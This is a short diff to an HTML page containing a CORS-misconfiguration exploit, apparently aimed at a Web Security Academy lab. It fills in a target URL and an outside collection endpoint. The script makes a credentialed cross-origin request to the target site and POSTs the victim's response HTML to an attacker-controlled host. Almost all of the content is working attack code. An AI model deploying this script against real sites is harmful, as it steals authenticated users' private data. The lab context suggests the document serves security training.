--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
 		<script>
 			var crossoriginget = new XMLHttpRequest();
 			//The target site with the bad CORS configuration
-			var url = 'https://[target-site/target-page]';
+			var url = 'https://ac1b1f301e29877380ad631d00bb006b.web-security-academy.net/';
 			crossoriginget.open('GET', url, true);
 			/*  This tells the browser to send the request with cookies;
 			    requires “Access-Control-Allow-Credentials = true” in
@@ -21,7 +21,7 @@
 			function reqListener() {
 				var exfiltraterequest = new XMLHttpRequest();
 				//Our server hosting the CORS attack
-				var maliciousurl = 'http://[our-server]:8000/cgi-bin/postlogger.py';
+				var maliciousurl = 'https://x-maximal-x.github.io/Max_CORS-2.0/';
 				exfiltraterequest.open('POST', maliciousurl);
 				exfiltraterequest.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
 				exfiltraterequest.send('responsehtml=' + encodeURIComponent(String(this.responseText)));
